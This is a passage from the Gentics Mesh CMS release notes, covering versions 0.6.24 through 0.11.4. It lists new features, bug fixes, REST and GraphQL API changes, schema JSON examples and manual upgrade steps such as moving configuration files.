deletion process will now also include all schema versions, referenced changes and jobs.\n\nicon:check[] Clustering: A NPE which could occur during initial setup of a clustered instance has been fixed.\n\n== 0.11.4 (07.12.2017)\n\nicon:check[] Core: Fixed various errors which could occur when loading a node for which the editor or creator user has been previously deleted.\n\n== 0.11.3 (30.11.2017)\n\nicon:plus[] Core: Various performance enhancements have been made to increase the concurrency handling and to lower the request times.\n\nicon:plus[] Websocket: It is now possible to register to a larger set of internal events.\n A full list of all events is documented within the link:{{< relref \"features.asciidoc\" >}}#_eventbus_bridge_websocket[eventbus bridge \/ websocket documentation].\n\nicon:plus[] Config: The eventloop and worker pool size can now be configured within the `mesh.yml` file.\n\nicon:plus[] Logging: The logging verbosity was reduced.\n\nicon:plus[] GraphQL: It is now possible to load a list of all languages of a node via the added `.languages` field.\n\nicon:plus[] GraphQL: The underlying graphql-java library was updated to version 6.0\n\nicon:check[] Core: Fixed a bug which prevented uploading multiple binaries to the same node.\n\nicon:check[] UI: Fixed error message handling for failed save requests.\n\nicon:check[] UI: Fixed the dropdown positioning in IE within the node edit area.\n\nicon:check[] Memory: The memory usage for micronode migrations has been improved.\n\n== 0.11.2 (21.11.2017)\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.30\n\nicon:check[] Core: Fixed a bug which caused unusual high CPU usage. link:https:\/\/github.com\/gentics\/mesh\/issues\/201[#201]\n\n== 0.11.1 (13.11.2017)\n\nicon:plus[] Elasticsearch: Add support for inline queries.\n\nicon:check[] Elasticsearch: In some cases the connection to Elasticsearch was not directly ready during start up. This caused various issues. A start-up check has been added in order to prevent this.\n\nicon:check[] Schema: A bug within the schema update mechanism which removed the urlField property value has been fixed.\n\nicon:check[] Elasticsearch: A deadlock situation which could occur during schema validation was fixed.\n\n== 0.11.0 (11.11.2017)\n\nCAUTION: GraphQL: The root field `releases` has been removed. The root field `release` now takes no parameters and loads the active release.\n\nCAUTION: Elasticsearch: Search queries will now automatically be wrapped in a boolean query in order to check permissions much more efficiently.\n\nCAUTION: The schema field property `searchIndex` \/ `searchIndex.addRaw` has been removed. The property was replaced by a mapping definition which can be added to each field.\n All schemas will automatically be migrated to the new format. Please keep in mind to also update any existing schema files which you may have stored externally.\n\n```json\n{\n \"name\": \"dummySchema\",\n \"displayField\": \"name\",\n \"fields\": [\n {\n \"name\": \"name\",\n \"label\": \"Name\",\n \"required\": true,\n \"type\": \"string\",\n \"elasticsearch\": {\n \"raw\": {\n \"index\": \"not_analyzed\",\n \"type\": \"string\"\n }\n }\n }\n ]\n}\n```\n\nicon:plus[] Schema: It is now possible to configure index settings and custom search index field mappings within the schema.\n\nThe index settings can be used to define new link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/analysis-analyzers.html[analyzers] and link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/analysis-tokenizers.html[tokenizer] or other additional link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/guide\/current\/_index_settings.html[index settings].\nThe specified settings will automatically be merged with a default set of settings.\n\nOnce a new analyzer has been defined it can be referenced by custom field mappings which can now be added to each field.\nThe specified field mapping will be added to the generated fields property of the mapping. You can read more about this topic in the link:https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/multi-fields.html[fields mapping documentation] of Elasticsearch.\n\n```json\n{\n \"name\": \"dummySchema\",\n \"displayField\": \"name\",\n \"elasticsearch\": {\n \"settings\": {\n \"number_of_shards\" : 1,\n \"number_of_replicas\" : 0\n },\n \"analysis\" : {\n \"analyzer\" : {\n \"suggest\" : {\n \"tokenizer\" : \"mesh_default_ngram_tokenizer\",\n \"char_filter\" : [ \"html_strip\" ],\n \"filter\" : [ \"lowercase\" ]\n }\n }\n }\n },\n \"fields\": [\n {\n \"name\": \"name\",\n \"label\": \"Name\",\n \"required\": true,\n \"type\": \"string\",\n \"elasticsearch\": {\n \"suggest\": {\n \"analyzer\": \"suggest\",\n \"type\": \"string\"\n }\n }\n }\n ]\n}\n```\n\nYou can use the `POST {apiLatest}\/utilities\/validateSchema` endpoint to validate and inspect the effective index configuration.\n\nicon:plus[] REST: The `POST {apiLatest}\/utilities\/validateSchema` and `POST {apiLatest}\/utilities\/validateMicroschema` endpoints can now be used to validate a schema\/microschema JSON without actually storing it.\n The validation response will also contain the generated Elasticsearch index configuration.\n\nicon:plus[] GraphQL: Nodes can now be loaded in the context of a schema. This will return all nodes which use the schema.\n\nicon:plus[] Search: The `{apiLatest}\/rawSearch\/..` and `{apiLatest}\/:projectName\/rawSearch\/..` endpoints have been added. These can be used to invoke search requests which will return the raw elasticsearch response JSON.\n The needed indices will automatically be selected in order to only return the type specific documents. Read permissions on the document will also be automatically checked.\n\nicon:plus[] Search: Error information for failed Elasticsearch queries will now be added to the response.\n\nicon:plus[] Webroot: The schema property `urlFields` can now used to specify fields which contain webroot paths.\n The webroot endpoint in turn will first try to find a node which specified the requested path.\n If no path could be found using the urlField values the regular segment path will be used to locate the node.\n This feature can be used to set custom urls or short urls for your nodes.\n\nicon:check[] Performance: Optimized binary download memory usage.\n\nicon:check[] REST: Fixed a bug which prevented pages with more than 2000 items from being loaded.\n\n== 0.10.4 (10.10.2017)\n\nCAUTION: REST: The `availableLanguages` field now also contains the publish information of the languages of a node.\n\nicon:check[] REST: Fixed a bug in the permission system. Permissions on microschemas will now correctly be updated when applying permission recursively on projects.\n\nicon:check[] REST: ETags will now be updated if the permission on the element changes.\n\nicon:check[] Core: Various bugs within the schema \/ microschema migration code have been addressed and fixed.\n\nicon:check[] Core: The search index handling has been updated. A differential synchronization will be run to update the new search index and thus the old index data can still be used.\n\nicon:check[] Performance: Removing permissions has been optimized.\n\nicon:plus[] UI: A new action was added to the node action context menu. It is now possible to unpublish nodes.\n\nicon:plus[] UI: The Mesh UI was updated.\n\nicon:plus[] Config: It is now possible to configure the host to which the Gentics Mesh http server should bind to via the `httpServer.host` setting in the `mesh.yml` file. Default is still 0.0.0.0 (all interfaces).\n\nicon:plus[] REST: The `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateSchemas` and `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateMicroschemas` endpoints have been changed from `GET` to `POST`.\n\nicon:plus[] REST: The `{apiLatest}\/admin\/reindex` and `{apiLatest}\/admin\/createMappings` endpoints have been changed from `GET` to `POST`.\n\nicon:plus[] CLI: It is now possible to reset the admin password using the `-resetAdminPassword` command line argument.\n\nicon:plus[] GraphQL: The underlying graphql-java library was updated to version 5.0\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.29\n\n== 0.10.3 (18.09.2017)\n\nicon:plus[] Logging: The `logback.xml` default logging configuration file will now be placed in the `config` folder. The file can be used to customize the logging configuration.\n\nicon:plus[] Configuration: It is now possible to set custom properties within the elasticsearch setting.\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.27\n\nicon:plus[] REST: It is now possible to set and read permissions using paths which contain the project name. Example: `GET {apiLatest}\/roles\/:roleUuid\/permissions\/:projectName\/...`\n\nicon:check[] Search: A potential race condition has been fixed. This condition previously caused the elasticsearch to no longer accept any changes.\n\nicon:check[] Performance: The REST API performance has been improved by optimizing the JSON generation process. link:https:\/\/github.com\/gentics\/mesh\/issues\/141[#141]\n\n== 0.10.2 (14.09.2017)\n\nicon:book[] Documentation: The new link:{{< relref \"security.asciidoc\" >}}[security] and link:{{< relref \"performance.asciidoc\" >}}[performance] sections have been added to our documentation.\n\nicon:plus[] The *Webroot-Response-Type* header can now be used to differentiate between a webroot binary and node responses. The values of this header can either be *binary* or *node*.\n\nicon:plus[] The `{apiLatest}\/admin\/status\/migrations` endpoint was removed.\n The status of a migration job can now be obtained via the `{apiLatest}\/admin\/jobs` endpoint. Successfully executed jobs will no longer be removed from the job list.\n\nicon:plus[] The `{apiLatest}\/:projectName\/release\/:releaseUuid\/schemas` and `{apiLatest}\/:projectName\/release\/:releaseUuid\/microschemas` endpoint has been reworked.\n The response format has been updated. The status and uuid of the job which has been invoked when the migration was started will now also be included in this response.\n\nicon:check[] Java REST Client: A potential threading issue within the Java REST Client has been fixed. Vert.x http clients will no longer be shared across multiple threads.\n\nicon:check[] Memory: Reduce memory footprint of microschema migrations. link:https:\/\/github.com\/gentics\/mesh\/issues\/135[#135]\n\nicon:check[] Fixed handling \"required\" and \"allow\" properties of schema fields when adding fields to schemas.\n\n== 0.10.1 (08.09.2017)\n\nicon:plus[] Clustering: Added link:{{< relref \"clustering.asciidoc\" >}}#_node_discovery[documentation] and support for cluster configurations which use a list of static IP adresses instead of multicast discovery.\n\nicon:plus[] Node Migration: The node migration performance has been increased.\n\nicon:plus[] REST: Added new endpoints `{apiLatest}\/admin\/jobs` to list and check queued migration jobs. The new endpoints are described in the link:{{< relref \"features.asciidoc\" >}}#_executing_migrations[feature documentation].\n\nicon:check[] Search: The `raw` field will no longer be added by default to the search index. Instead it can be added using the new `searchIndex.addRaw` flag within the schema field.\n Please note that the raw field value in the search index will be automatically truncated to a size of 32KB. Otherwise the value can't be added to search index.\n\nicon:check[] Migration: Interrupted migrations will now automatically be started again after the server has been started. Failed migration jobs can be purged or reset via the `{apiLatest}\/admin\/jobs` endpoint.\n\nicon:check[] Migration: Migrations will no longer fail if a required field was added. The field will be created and no value will be set. Custom migration scripts can still be used to add a custom default value during migration.\n\n[source,json]\n----\n{\n \"name\" : \"name\",\n \"label\" : \"Name\",\n \"required\" : true,\n \"type\" : \"string\",\n \"searchIndex\": {\n \"addRaw\": true\n }\n}\n----\n\nicon:check[] Java REST Client: Various missing request parameter implementations have been added to the mesh-rest-client module.\n\nicon:check[] Node Migration: A bug has been fixed which prevented node migrations with more than 5000 elements from completing.\n\nicon:check[] GraphQL: Updated GraphiQL browser to latest version to fix various issues when using aliases.\n\n== 0.10.0 (04.09.2017)\n\n\nCAUTION: Manual Change: Configuration changes. For already existing `mesh.yml` files, the `nodeName` setting has to be added. Choose any name for the mesh instance.\n\nCAUTION: Manual Change: Configuration changes. The `clusterMode` setting has been deprecated in favour of the new cluster configuration. This setting must be removed from the `mesh.yml` file.\n\n[CAUTION]\n=====================================================================\nManual Change: The configuration files `mesh.yml`, `keystore.jceks` must be moved to a subfolder `config` folder.\n\n[source,bash]\n----\nmkdir config\nmv mesh.yml config\nmv keystore.jceks config\n----\n=====================================================================\n\n[CAUTION]\n=====================================================================\nManual Change: The graph database folder needs to be moved. Please create the `storage` subfolder and move the existing data into that folder.\n\n[source,bash]\n----\nmkdir -p data\/graphdb\/storage\nmv data\/graphdb\/* data\/graphdb\/storage\/\n----\n=====================================================================\n\nicon:plus[] Clustering: This release introduces the master-master clustering support. You can read more about clustering and the configuration in the link:{{< relref \"clustering.asciidoc\" >}}[clustering documentation].\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.26\n\nicon:plus[] REST: The `{apiLatest}\/admin\/consistency\/check` endpoint has been added. The endpoint can be used to verify the database integrity.\n\nicon:check[] Core: Fixed missing OrientDB roles and users for some older graph databases. Some graph databases did not create the needed OrientDB user and roles. These roles and users are needed for the OrientDB server and are different from Gentics Mesh users and roles.\n\nicon:check[] REST: Invalid date strings were not correctly handled. An error will now be thrown if a date string can't be parsed.\n\nicon:check[] REST: The delete handling has been updated.\n It is now possible to specify the `?recursive=true` parameter to recursively delete nodes.\n By default `?recursive=false` will be used. Deleting a node which contains children will thus cause an error.\n The behaviour of node language deletion has been updated as well. Deleting the last language of a node will also remove this node. This removal will again fail if no `?recursive=true` query parameter has been added.\n\n== 0.9.28 (28.08.2017)\n\nicon:check[] Core: The permission check system has been updated. The elements which have only `readPublished` permission can now also be read if the user has only `read` permission. The `read` permission automatically also grants `readPublished`.\n\nicon:check[] Java REST Client: The classes `NodeResponse` and `MicronodeField` now correctly implement the interface `FieldContainer`.\n\nicon:check[] REST: The endpoint `{apiLatest}\/{projectName}\/nodes\/{nodeUuid}\/binary\/{fieldName}` did not correctly handle the read published nodes permission. This has been fixed now. link:https:\/\/github.com\/gentics\/mesh\/issues\/111[#111]\n\n== 0.9.27 (23.08.2017)\n\nicon:plus[] GraphQL: It is now possible to retrieve the unfiltered result count. This count is directly loaded from the search provider and may not match up with the exact filtered count.\n The advantage of this value is that it can be retrieved very fast.\n\nicon:plus[] Java REST Client: The client now also supports encrypted connections.\n\nicon:check[] REST: Invalid date were not correctly handled. An error will now be thrown if a date string can't be parsed.\n\nicon:check[] GraphQL: Various errors which occurred when loading a schema of a node via GraphQL have been fixed now.\n\n== 0.9.26 (10.08.2017)\n\nicon:plus[] UI: Added CORS support. Previously CORS was not supported by the UI.\n\nicon:check[] REST API: Added a missing allowed CORS headers which were needed to use the Gentics Mesh UI in a CORS environment.\n\nicon:check[] UI: Fixed translation action. Previously a error prevented translations from being executed.\n\nicon:check[] UI: Fixed image handling for binary fields. Previously only the default language image was displayed in the edit view. This has been fixed.\n\n== 0.9.25 (09.08.2017)\n\nicon:plus[] Demo: The demo dump extraction will now also work if an empty data exists. This is useful when providing a docker mount for the demo data.\n\nicon:plus[] GraphQL: The paging performance has been improved.\n\nicon:plus[] Core: Various missing permission checks have been added.\n\nicon:check[] Core: A bug in the schema changes apply code has been fixed. The bug previously prevented schema changes from being applied.\n\n== 0.9.24 (03.08.2017)\n\nicon:plus[] REST API: Added idempotency checks for various endpoints to prevent execution of superfluous operations. (E.g: Assign role to group, Assign schema to project)\n\nicon:check[] Core: Fixed a bug which prevented micronodes from being transformed. SUP-4751\n\n== 0.9.23 (02.08.2017)\n\nicon:plus[] Rest-Client: It is now possible to configure the base uri for the rest client.\n\nicon:plus[] GraphQL: It is now possible to get the reference of all projects from schemas and microschemas.\n\nicon:check[] UI: Date fields now work with ISO 8601 strings rather than Unix timestamps.\n\nicon:check[] UI: Fixed bugs with lists of microschemas. (SUP-4712)\n\nicon:check[] UI: Fixed mouse clicks not working in lists in FF and (partially) in IE\/Edge. (SUP-4717)\n\nicon:check[] Core: The reindex performance has been increased and additional log output will be provided during operations actions.\n\n== 0.9.22 (28.07.2017)\n\nicon:plus[] REST API: It is now possible to create nodes, users, groups, roles, releases and projects using a provided uuid.\n\nicon:check[] Versioning: A publish error which was caused due to a bug in the node language deletion code has been fixed.\n\n== 0.9.21 (26.07.2017)\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.24\n\nicon:check[] Core: Fixed handling of ISO8601 dates which did not contain UTC flag or time offset value. Such dates could previously not be stored. Note that ISO8601 UTC dates will always be returned.\n\nicon:check[] GraphQL: URL handling of the GraphQL browser has been improved. Previously very long queries lead to very long query parameters which could not be handled correctly. The query browser will now use the anchor part of the URL to store the query.\n\nicon:check[] Migration: The error handling within the schema migration code has been improved.\n\nicon:plus[] GraphQL: It is now possible to load the schema version of a node using the ```schema``` field.\n\nicon:check[] Versioning: Older Gentics Mesh instances (>0.8.x) were lacking some draft information. This information has been added now.\n\n== 0.9.20 (21.07.2017)\n\nicon:plus[] License: The license was changed to Apache License 2.0\n\nicon:plus[] Schema Versions: The schema version field type was changed from `number` to `string`. It is now also possible to load schema and microschema versions using the `?version` query parameter.\n\nicon:check[] Search: The error reporting for failing queries has been improved.\n\nicon:check[] Search: The total page count value has been fixed for queries which were using `?perPage=0`.\n\n== 0.9.19 (07.07.2017)\n\nicon:check[] UI: Fixed adding node to node list.\n\nicon:check[] Docs: Various endpoints were not included in the generated RAML. This has been fixed now.\n\n== 0.9.18 (30.06.2017)\n\nicon:plus[] Demo: Fixed demo data uuids.\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.22\n\nicon:plus[] Core: The Ferma OGM library was updated to version 2.2.2\n\n== 0.9.17 (21.06.2017)\n\nicon:check[] UI: A bug which prevented micronodes which contained empty node field from being saved was fixed.\n\nicon:check[] Core: Issues within the error reporting mechanism have been fixed.\n\nicon:plus[] Server: The Mesh UI was added to the mesh-server jar.\n\nicon:plus[] Core: The internal transaction handling has been refactored.\n\nicon:plus[] Core: The Vert.x core dependency was updated to version 3.4.2\n\nicon:plus[] API: The version field of node responses and publish status responses are now strings instead of objects containing the version number.\n\n== 0.9.16 (19.06.2017)\n\nicon:book[] Documentation: Huge documentation update.\n\n== 0.9.15 (19.06.2017)\n\nicon:check[] GraphQL: Fixed loading tags for nodes.\n\n== 0.9.14 (09.06.2017)\n\nicon:check[] WebRoot: Bugs within the permission handling have been fixed. It is now possible to load nodes using only the *read_published* permission. This permission was previously ignored.\n\nicon:check[] GraphQL: An introspection bug which prevented graphiql browser auto completion from working correctly has been fixed. The bug did not occur on systems which already used microschemas.\n\n== 0.9.13 (08.06.2017)\n\nicon:check[] UI: The UI was updated. An file upload related bug was fixed.\n\nicon:check[] UI: Schema & Microschema description is no longer a required field.\n\n== 0.9.12 (08.06.2017)\n\nicon:check[] GraphQL: Fixed handling of node lists within micronodes.\n\nicon:check[] GraphQL: Fixed Micronode type not found error.\n\nicon:check[] GraphQL: Fixed GraphQL API for system which do not contain any microschemas.\n\nicon:check[] GraphQL: Fixed permission handling and filtering when dealing with node children.\n\n== 0.9.11 (07.06.2017)\n\nicon:plus[] GraphQL: The GraphQL library was updated. Various GraphQL related issues have been fixed.\n\n== 0.9.10 (29.05.2017)\n\nicon:plus[] Schemas: The default content and folder schemas have been updated. The `fileName` and `folderName` fields have been renamed to `slug`. The `name` field was removed from the content schema and a `teaser` field has been added.\nThese changes are optional and thus not automatically applied to existing installations.\n\nicon:plus[] Demo: The `folderName` and `fileName` fields have been renamed to `slug`. This change only affects new demo installations.\n\n\nicon:check[] GraphQL: The language fallback handling was overhauled. The default language will no longer be automatically be append to the list of fallback languages. This means that loading nodes will only return nodes in those languages which have been specified by the `lang` argument.\n\nicon:check[] GraphQL: The `path` handling for nodes within node lists has been fixed. Previously it was not possible to retrieve the `path` and various other fields for those nodes.\n\n== 0.9.9 (19.05.2017)\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.20.\n\nicon:plus[] API: The following endpoints were moved:\n\n * `{apiLatest}\/admin\/backup` \u27f6 `{apiLatest}\/admin\/graphdb\/backup`\n * `{apiLatest}\/admin\/export` \u27f6 `{apiLatest}\/admin\/graphdb\/export`\n * `{apiLatest}\/admin\/import` \u27f6 `{apiLatest}\/admin\/graphdb\/import`\n * `{apiLatest}\/admin\/restore` \u27f6 `{apiLatest}\/admin\/graphdb\/restore`\n\nicon:plus[] Core: Added `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateMicroschemas` endpoint which can be used to resume previously unfinished micronode migrations.\n\nicon:plus[] Performance: The startup performance has been increased when dealing with huge datasets.\n\nicon:plus[] Auth: The anonymous authentication mechanism can now also be disabled by setting the `Anonymous-Authentication: disable` header. This is useful for client applications which don't need or want anonymous authentication. The Gentics Mesh REST client has been enhanced accordingly.\n\nicon:plus[] Core: The read performance of node lists has been improved.\n\nicon:plus[] Core: The write performance of nodes has been improved.\n\nicon:plus[] Demo: The demo data have been updated. The a folderName and fileName field has been added to the demo schemas.\n\nicon:plus[] GraphQL: Added micronode list handling. Previously it was not possible to handle micronode list fields.\n\nicon:check[] Core: Fixed NPE that was thrown when loading releases on older systems.\n\nicon:check[] Core: An upgrade error has been fixed which was caused by an invalid microschema JSON format error.\n\nicon:check[] UI: You will no longer be automatically logged in as anonymous user once your session expires.\n\nicon:check[] Core: The language fallback handling for node breadcrumbs has been fixed. Previously the default language was not automatically added to the handled languages.\n\n== 0.9.8 (08.05.2017)\n\nicon:plus[] UI: Microschemas can now be assigned to projects.\n\nicon:plus[] UI: Descriptions can now be assigned to schemas & microschemas.\n\nicon:plus[] Core: A bug was fixed which prevented the node response `project` property to be populated.\n\nicon:plus[] Core: The redundant `isContainer` field was removed from the node response.\n\nicon:plus[] Core: Various bugs for node migrations have been fixed.\n\nicon:plus[] Core: The allow property for micronode schema fields will now correctly be handled.\n\nicon:plus[] Core: Microschemas will now be assigned to projects during a schema update. This only applies for microschemas which are referenced by the schema (e.g. via a micronode field).\n\nicon:plus[] Core: The OrientDB graph database was updated to version 2.2.19.\n\n== 0.9.7 (28.04.2017)\n\nicon:plus[] GraphQL: The nested `content` and `contents` fields have been removed. The properties of those fields have been merged with the `node` \/ `nodes` field.\n\nicon:plus[] GraphQL: The field names for paged resultset meta data have been updated to better match up with the REST API fields.\n\nicon:plus[] GraphQL: A language can now be specified when loading node reference fields using the `lang` argument.\n\nicon:plus[] GraphQL: It is now possible to resolve links within loaded fields using the `linkType` field argument.\n\nicon:plus[] Auth: Support for anonymous access has been added to mesh. Requests which do not provide a `mesh.token` will automatically try to use the `anonymous` user. This user is identified by `username` and the thus no anonymous access support is provided if the user can't be located.\n\nicon:plus[] GraphQL: It is now possible to retrieve the path for a content using the `path` field. The `Node.languagePaths` has been removed in favour of this new field.\n\nicon:plus[] Auth: It is now possible to issue API tokens via the `GET {apiLatest}\/users\/:userUuid\/token` endpoint. API tokens do not expire and work in conjunction with the regular JWT authentication mechanism. These tokens should only be used when SSL is enabled. The `DELETE {apiLatest}\/users\/:userUuid\/token` endpoint can be used to revoke the issued API token. Only one API token is supported for one user. Generating a new API token will invalidate the previously issued token.\n\nicon:check[] GraphQL: An error was fixed which occurred when loading a node using a bogus uuid.\n\nicon:check[] Auth: An error which caused the keystore loading process to fail was fixed.\n\n== 0.9.6 (14.04.2017)\n\nicon:plus[] It is now possible to resume previously aborted schema migrations via the `{apiLatest}\/:projectName\/releases\/:releaseUuid\/migrateSchemas` endpoint.\n\nicon:plus[] Auth: The Java keystore file will now automatically be created if none could be found. The keystore password will be taken from the `mesh.yml` file or randomly generated and stored in the config.\n\nicon:check[] Core: Migration errors will no longer cause a migration to be aborted. The migration will continue and log the errors. An incomplete migration can be resumed later on.\n\nicon:check[] Core: Fixed node migration search index handling. Previous migrations did not correctly update the index. A automatic reindex will be invoked during startup.\n\n== 0.9.5 (13.04.2017)\n\nicon:check[] Core: The schema check for duplicate field labels has been removed. The check previously caused schema updates to fail.\n\n== 0.9.4 (13.04.2017)\n\nicon:check[] UI: Fixed project creation.\n\nicon:check[] UI: Fixed error when attempting to translate a node.\n\nicon:check[] UI: Fixed incorrect search query.\n\nicon:check[] UI: Display error when attempting to publish a node with an unpublished ancestor\n\nicon:check[] JWT: The `signatureSecret` property within the Gentics Mesh configuration has been renamed to `keystorePassword`.\n\nicon:plus[] JWT: It is now possible to configure the algorithm which is used to sign the JWT tokens.\n\nicon:plus[] Java: The Java model classes have been updated to provide fluent API's.\n\nicon:plus[] Demo: It is now possible to access elasticsearch head UI directly from mesh via http:\/\/localhost:8080\/elastichead - The UI will only be provided if the elasticsearch http ports are enabled. Only enable this for development since mesh will not protect the Elasticsearch HTTP server.\n\nicon:plus[] Core: Downgrade and upgrade checks have been added. It is no longer possible to run Gentics Mesh using a dump which contains data which was touched by a newer mesh version. Upgrading a snapshot version of Gentics Mesh to a release version can be performed under advisement.\n\n== 0.9.3 (10.04.2017)\n\nicon:check[] UI: A bug which prevented assigning created schemas to projects was fixed.\n\nicon:check[] A bug which could lead to concurrent request failing was fixed.\n\nicon:check[] Error handling: A much more verbose error will be returned when creating a schema which lacks the type field for certain schema fields.\n\nicon:check[] GraphQL: A bug which lead to incorrect column values for GraphQL errors was fixed.\n\nicon:plus[] The OrientDB dependency was updated to version 2.2.18.\n\nicon:plus[] GraphQL: The container\/s field was renamed to content\/s to ease usage.\n\nicon:plus[] GraphQL: It is no longer possible to resolve nodes using the provided webroot path. The path argument and the resolving was moved to the `content` field.\n\n== 0.9.2 (04.04.2017)\n\nicon:plus[] The `{apiLatest}\/admin\/backup`, `{apiLatest}\/admin\/restore`, `{apiLatest}\/admin\/import`, `{apiLatest}\/admin\/export` endpoints were added to the REST API. These endpoint allow the creation of backup dumps.\n\nicon:plus[] GraphQL: It is now possible to execute elasticsearch queries. within the GraphQL query.\n\nicon:plus[] GraphQL: It is now possible to resolve a partial web root path using the `child` field of a node.\n\nicon:plus[] GraphQL: It is now possible to resolve information about the running mesh instance via GraphQL.\n\nicon:check[] Various issues with the linkType argument within the GraphQL API have been fixed.\n\nicon:check[] Fixed NPE that occurred when loading a container for a language which did not exist.\n\n== 0.9.1 (28.03.2017)\n\nicon:check[] The `Access-Control-Allow-Credentials: true` Header will now be returned when CORS support is enabled.\n\nicon:check[] A NullPointerException within the Java Rest Client was fixed.\n\nicon:check[] The AngularJS Demo was updated.\n\n== 0.9.0 (27.03.2017)\n\nicon:plus[] Gentics Mesh now supports GraphQL.\n\nicon:important[] The `expandAll` and `expand` parameters will be removed within an upcoming release of Gentics Mesh. We highly recommend to use the GraphQL endpoint instead if you want to fetch deeply nested data.\n\nicon:plus[] Schema name validation - Schema and microschema names must only contain letter, number or underscore characters.\n\nicon:plus[] Node Tag Endpoint\n\nThe endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/tags` was enhanced. It is now possible to post a list of tag references which will be applied to the node. Tags which are not part of the list will removed from the node. Tags which do not exist will be created. Please note that tag families will not automatically be created.\n\nThe `tags` field within the node response was updated accordingly.\n\n== 0.8.3 (24.02.2017)\n\nicon:plus[] Tags are now also indexed in the node document in the field `tagFamilies`, grouped by tag families.\n\n== 0.8.2 (23.02.2017)\n\nicon:check[] The trigram filter configuration was updated so that all characters will be used to tokenize the content.\n\n== 0.8.1 (21.02.2017)\n\nicon:check[] A bug which prevented index creation in certain cases was fixed.\n\n== 0.8.0 (10.02.2017)\n\nicon:plus[] Names, string fields and html field values will now be indexed using the https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/guide\/current\/ngrams-compound-words.html[trigram analyzer].\n\nicon:plus[] Binary Endpoint Overhaul\n\nThe field API endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/languages\/:language\/fields\/:field` was removed and replaced by the binary `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/binary` endpoint.\nThe binary endpoints are now also versioning aware and handle conflict detection. It is thus required to add the `language` and `version` form data parameters to the upload request.\n\nicon:plus[] Transform Endpoint Overhaul\n\nThe endpoint `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/languages\/:language\/fields\/:field\/transform` was renamed to `{apiLatest}\/:projectName\/nodes\/:nodeUuid\/binaryTransform`.\nThe transform endpoint will now return the updated node.\n\nicon:plus[] The no longer needed schemaReference property was removed from node update requests.\n\nicon:plus[] The rootNodeUuid property within node project response was changed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n\u2026\n \"rootNodeUuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n\u2026\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n\u2026\n \"rootNode\": {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n },\n\u2026\n}\n----\n____\n\nicon:plus[] The parentNodeUuid property within node create requests was changed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n\u2026\n \"parentNodeUuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n\u2026\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n\u2026\n \"parentNode\": {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n },\n\u2026\n}\n----\n____\n\nicon:plus[] JSON Schema information have been added to the RAML API documentation. This information can now be used to generate REST model types for various programming languages.\n\nicon:plus[] The navigation response JSON was restructured. The root element was removed.\n\n[quote, Example]\n____\nOld structure:\n[source,json]\n----\n{\n \"root\" : {\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n \"node\" : {\u2026},\n \"children\" : [\u2026]\n }\n}\n----\n\nNew structure:\n[source,json]\n----\n{\n \"uuid\" : \"cd5ac8943a4448ee9ac8943a44a8ee25\",\n \"node\" : {\u2026},\n \"children\" : [\u2026]\n}\n----\n____\n\n\n\n== 0.7.0 (19.01.2017)\n\nicon:bullhorn[] Content releases support\n\n[quote]\n____\nThis version of Gentics Mesh introduces _Content Releases_. A detailed description of this feature can be found in our https:\/\/getmesh.io\/docs[Documentation].\n____\n\nicon:bullhorn[] Versioning support\n\n[quote]\n____\nThis version of Gentics Mesh introduces versioning of contents. A detailed description of the versioning feature can be found in our https:\/\/getmesh.io\/docs[Documentation].\n\nImportant changes summary:\n\n* Node update request must now include the version information\n* The query parameter `?version=published` must be used to load published nodes. Otherwise the node will not be found because the default version scope is __draft__.\n* Two additional permissions for nodes have been added: __publish__, __readpublished__\n\nExisting databases will automatically be migrated during the first setup.\n____\n\nicon:plus[] The missing *availableLanguages* and *defaultLanguage* parameters have been added to the *mesh-ui-config.js* file. Previously no language was configured which removed the option to translate contents.\n\nicon:plus[] Image Property Support - The binary field will now automatically contain properties for image *width*, image *height* and the main *dominant color* in the image.\n\nicon:plus[] API Version endpoint - It is now possible to load the mesh version information via a `GET` request to `{apiLatest}\/`.\n\nicon:plus[] Project endpoint - The current project information can now be loaded via a `GET` request to `{apiLatest}\/:projectName`.\n\nicon:check[] When the search indices where recreated with the reindex endpoint, the mapping for the raw fields was not added. This has been fixed now.\n\nicon:check[] The search index mapping of fields of type \"list\" were incorrect and have been fixed now.\n\nicon:check[] Various issues with the schema node migration process have been fixed.\n\n== 0.6.29 (07.03.2017)\n\nicon:plus[] The documentation has been enhanced.\n\nicon:check[] Missing fields could cause error responses. Instead the missing fields will now be set to null instead.\n\n== 0.6.28 (21.10.2016)\n\nicon:check[] Missing fields could cause error responses. Instead the missing fields will now be set to null instead.\n\n== 0.6.27 (07.10.2016)\n\nicon:check[] Various issues with the schema node migration process have been fixed.\n\n== 0.6.26 (05.10.2016)\n\nicon:plus[] The maximum transformation depth limit was raised from 2 to 3.\n\n== 0.6.25 (20.09.2016)\n\nicon:plus[] The used Vert.x version was bumped to 3.3.3.\n\n== 0.6.24 (19.09.2016)\n\nicon:plus[] The Gentics Mesh admin ui has been updated. The UI will no longer send basic auth information for succeeding requests which were invoked after the login action 